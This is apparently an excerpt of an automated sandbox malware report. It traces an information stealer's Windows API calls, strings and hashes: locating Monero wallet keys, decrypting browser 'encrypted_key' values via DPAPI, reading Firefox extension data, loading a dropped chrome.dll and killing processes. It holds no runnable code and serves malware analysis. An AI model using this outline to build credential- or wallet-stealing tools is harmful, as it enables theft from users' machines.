                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 13672faa1151c2f08421de85165e4e6215d3e1f1ab37a8dc0f10e00e7d0578d2
                                  • Instruction ID: 586df9bce244e0d914e82feb36d6670f9943b15777f9f9b2c16699c9ef10bf9f
                                  • Opcode Fuzzy Hash: 13672faa1151c2f08421de85165e4e6215d3e1f1ab37a8dc0f10e00e7d0578d2
                                  • Instruction Fuzzy Hash: 37212EB1A44208AFDB00DFD8DD45FAEBBB8FB48711F104219F615A73D1C77999018BA1
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007EA098
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                   • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                  • API String ID: 1029625771-1545816527
                                  • Opcode ID: f979062c1975585a2ec5332b9f033587e1bf0fba781a94b0673c7231afc7310f
                                  • Instruction ID: 41e871c75545bda52b46d268715137bdad3be79887a4ce677263647b0310d22d
                                  • Opcode Fuzzy Hash: f979062c1975585a2ec5332b9f033587e1bf0fba781a94b0673c7231afc7310f
                                  • Instruction Fuzzy Hash: 14F06D70A5D244EED701FBA1EC4CB5D3764E789300F20072AF005A32B2C2F96886CB12
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007F96AE,00000000), ref: 007F8EEB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F8EF2
                                  • wsprintfW.USER32 ref: 007F8F08
                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: ca421a35e6a0a6220d72b5b1289607088dccf6ae8127132d9fd130af49ff9fc5
                                  • Instruction ID: 34bb23f64708144b0995b99cba7a2ab7a5b9abd99b48033c8b4f5871111c3865
                                  • Opcode Fuzzy Hash: ca421a35e6a0a6220d72b5b1289607088dccf6ae8127132d9fd130af49ff9fc5
                                  • Instruction Fuzzy Hash: 64E0EC75A48309BBDB10DFE4ED0AEAD77B8EB45701F004294FD09D73A1DAB19E109BA1
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007EAA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 007EAB2F
                                  • lstrlen.KERNEL32(00000000), ref: 007EADEC
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 007EAE73
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 9c149de1144fe8d61b5aea7ba6484a1796eaf2b564d5bd44756349faafe4b247
                                  • Instruction ID: 05fae5ba2ad16b40452018749bee24adecf4a018e321dbfd44e77123b027bdc8
                                  • Opcode Fuzzy Hash: 9c149de1144fe8d61b5aea7ba6484a1796eaf2b564d5bd44756349faafe4b247
                                  • Instruction Fuzzy Hash: AEE1B2B291011CEBCB04EBA4DDA6EFE7339AF54300F508555F21A72291DF386A48CB76
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED581
                                  • lstrlen.KERNEL32(00000000), ref: 007ED798
                                  • lstrlen.KERNEL32(00000000), ref: 007ED7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 007ED82B
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 2338cc5b8f72a0460bd2726f81b25a3139f108174dddf214d3679686f17c9d65
                                  • Instruction ID: 70bfb3fd682d0c8611954112ac3a8afb3d393bc7b8257f7b1f6b41549d8b2319
                                  • Opcode Fuzzy Hash: 2338cc5b8f72a0460bd2726f81b25a3139f108174dddf214d3679686f17c9d65
                                  • Instruction Fuzzy Hash: 2491D9B191010CEBCB04FBA4DDAADFE7339AF54300F504559F21A66291EF786A08CB76
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED901
                                  • lstrlen.KERNEL32(00000000), ref: 007EDA9F
                                  • lstrlen.KERNEL32(00000000), ref: 007EDAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 007EDB32
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 93157c1a9d5936b35a644e762c7f18e6c09bf19095b1084b1dc97c5ef0c4dbc0
                                  • Instruction ID: 0ef0ee301f0e3321ad8a90520333c0a10b056cbcc18ca6faa8a32207bfb35584
                                  • Opcode Fuzzy Hash: 93157c1a9d5936b35a644e762c7f18e6c09bf19095b1084b1dc97c5ef0c4dbc0
                                  • Instruction Fuzzy Hash: 9C81C8B191010CEBCB04FBA4DC6ADFE7339AF54300F404559F61A662A1EF786A09CB76
                                  APIs
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: d4544d6219517c5666e9ded3a7a06efe673725e03fa554991886c9a3463c8da2
                                  • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction Fuzzy Hash: 3C51E372500606AFEB298F58C841BBA73A4FF01302F24452DEE05D6992EB31ED44DB96
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 007EA664
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: bdf0de5b68c2429f02d9fcdfc7e1ee433b5f17828fcc69b16aba738e8fedfb2c
                                  • Instruction ID: 0cb5fa2cee9e0b27238418ea6fa34358399340a472ecd4d5117193c270ab64f6
                                  • Opcode Fuzzy Hash: bdf0de5b68c2429f02d9fcdfc7e1ee433b5f17828fcc69b16aba738e8fedfb2c
                                  • Instruction Fuzzy Hash: A2514CB0A1124CEFDB24DFA4CD9ABED7776AF44344F008118FA0A5B291EB786A05CB51
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00801678,00800D93), ref: 007EF64C
                                  • lstrlen.KERNEL32(00000000), ref: 007EF66B
                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: bc9efdef2aeca1f6fc8e2ac4c9f5385d22d1f1344f54591132e1bdfb5ec34cd1
                                  • Instruction ID: 0cb7e7c54b812656358f590d376ad6f047b32e25100e30bcdd487f66d4e5a491
                                  • Opcode Fuzzy Hash: bc9efdef2aeca1f6fc8e2ac4c9f5385d22d1f1344f54591132e1bdfb5ec34cd1
                                  • Instruction Fuzzy Hash: 9551B1F191020CEACB04FBA4DD5ADFD7379AF54340F408568F51A67291EF386A19CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 6bbff8b90d77023f9c1f5569148e0b52191746353da9ddae134573838702f6b5
                                  • Instruction ID: f322d28e857f982b250aadafe68531d6906842670c8c965a07938bf4752aae81
                                  • Opcode Fuzzy Hash: 6bbff8b90d77023f9c1f5569148e0b52191746353da9ddae134573838702f6b5
                                  • Instruction Fuzzy Hash: 0141FCB1D00209EFCF04EFA4D859AFEB779AF54314F008118F61676291EB78AA05CFA1
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007EA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                    • Part of subcall function 007EA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                    • Part of subcall function 007EA110: LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                    • Part of subcall function 007EA110: ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                    • Part of subcall function 007EA110: LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                    • Part of subcall function 007EA110: CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007EA489
                                    • Part of subcall function 007EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA23F
                                    • Part of subcall function 007EA210: LocalAlloc.KERNEL32(00000040,?,?,?,007E4F3E,00000000,?), ref: 007EA251
                                    • Part of subcall function 007EA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O~,00000000,00000000), ref: 007EA27A
                                    • Part of subcall function 007EA210: LocalFree.KERNEL32(?,?,?,?,007E4F3E,00000000,?), ref: 007EA28F
                                    • Part of subcall function 007EA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007EA2D4
                                    • Part of subcall function 007EA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 007EA2F3
                                    • Part of subcall function 007EA2B0: LocalFree.KERNEL32(?), ref: 007EA323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 7977e20aa3bb9fcb9544c945705810bbb443c4e5debaafc901bd64d513cab2c7
                                  • Instruction ID: 535d4a809d7d3d904522abd8890ff457a295e9ddefde4f4e5f95437efc4c2656
                                  • Opcode Fuzzy Hash: 7977e20aa3bb9fcb9544c945705810bbb443c4e5debaafc901bd64d513cab2c7
                                  • Instruction Fuzzy Hash: 9F3143B6D01209ABCF14DFD5DC45AEFB7B8BF58304F444518E905A7245E738AE14CB62
                                  APIs
                                  • memset.MSVCRT ref: 007F967B
                                    • Part of subcall function 007F8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,007F96AE,00000000), ref: 007F8EEB
                                    • Part of subcall function 007F8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 007F8EF2
                                    • Part of subcall function 007F8EE0: wsprintfW.USER32 ref: 007F8F08
                                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 007F973B
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F9759
                                  • CloseHandle.KERNEL32(00000000), ref: 007F9766
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID:
                                  • API String ID: 3729781310-0
                                  • Opcode ID: 73220d4e94252da191969d4325a8672647807620e711dadc64612137e5e2a572
                                  • Instruction ID: cf022be762b14cd7f5513c02ddd33ff676c1cccdc46c968f9ad85cfd1f2ec51a
                                  • Opcode Fuzzy Hash: 73220d4e94252da191969d4325a8672647807620e711dadc64612137e5e2a572
                                  • Instruction Fuzzy Hash: A9313CB5A1030CEBDB14DFE0CD49BEDB778BB44700F104558F606AB295DBB86A49CB61
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008005BF), ref: 007F885A
                                  • Process32First.KERNEL32(?,00000128), ref: 007F886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 007F8883
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                  • CloseHandle.KERNEL32(?), ref: 007F88F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: a10f58070b0983b4e941522d79e54c250cb843eb7c8a7ae65adc77baf675c1bd
                                  • Instruction ID: 996678b70dd9b9272963633c88bb91c1629ce6fb58959c855e04a92457f591d0
                                  • Opcode Fuzzy Hash: a10f58070b0983b4e941522d79e54c250cb843eb7c8a7ae65adc77baf675c1bd
                                  • Instruction Fuzzy Hash: 5D314BB1901218EBCB64DB94DC55BEEB778EB44740F104299E20EA22A0DB786A44CFA1
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0085FE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0085FE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: f9c999a71f16f71a2f6fad7d69b7890161bfcbdb6b9e923a841e4e5f72090827
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: 0101B13210ABA5EEFE3426785CCA96A2694FB017B67354339FA16C81F3EF514C499242
                                  APIs
                                  • CreateFileA.KERNEL32(007F3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,007F3D3E,?), ref: 007F948C
                                  • GetFileSizeEx.KERNEL32(000000FF,007F3D3E), ref: 007F94A9
                                  • CloseHandle.KERNEL32(000000FF), ref: 007F94B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: 68fa8018a2a177fd860959a4787ddb7fef41d400bcf00cf06dd1c599311d381c
                                  • Instruction ID: 860718a94838801ec8d823c2e943f60251af62d39045fc2a59e39e9be640b6da
                                  • Opcode Fuzzy Hash: 68fa8018a2a177fd860959a4787ddb7fef41d400bcf00cf06dd1c599311d381c
                                  • Instruction Fuzzy Hash: 3EF03135E04208BBDB10DFF4EC49F6F77B9AB98710F108654FB11A7290D67496028B50
                                  APIs
                                  • __getptd.LIBCMT ref: 007FCA7E
                                    • Part of subcall function 007FC2A0: __amsg_exit.LIBCMT ref: 007FC2B0
                                  • __getptd.LIBCMT ref: 007FCA95
                                  • __amsg_exit.LIBCMT ref: 007FCAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 007FCAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 5a661a4395b22e25c6596b9e03c6aa4b7f1ec5739550426b78d3c99e7463c2e6
                                  • Instruction ID: 4032eeaa56adc3d9cb4497c53e8499f4b7ba217ec8fee36b6fa5d0ac0481c16e
                                  • Opcode Fuzzy Hash: 5a661a4395b22e25c6596b9e03c6aa4b7f1ec5739550426b78d3c99e7463c2e6
                                  • Instruction Fuzzy Hash: F2F0963194471DDBD666FBB8990B77E33A0BF00720F158149F714A63D2CB2C69409695
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  APIs
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F51CA
                                  • lstrcat.KERNEL32(?,00801058), ref: 007F51E7
                                  • lstrcat.KERNEL32(?,01458BB0), ref: 007F51FB
                                  • lstrcat.KERNEL32(?,0080105C), ref: 007F520D
                                    • Part of subcall function 007F4B60: wsprintfA.USER32 ref: 007F4B7C
                                    • Part of subcall function 007F4B60: FindFirstFileA.KERNEL32(?,?), ref: 007F4B93
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,00800FC4), ref: 007F4BC1
                                    • Part of subcall function 007F4B60: StrCmpCA.SHLWAPI(?,00800FC8), ref: 007F4BD7
                                    • Part of subcall function 007F4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 007F4DCD
                                    • Part of subcall function 007F4B60: FindClose.KERNEL32(000000FF), ref: 007F4DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0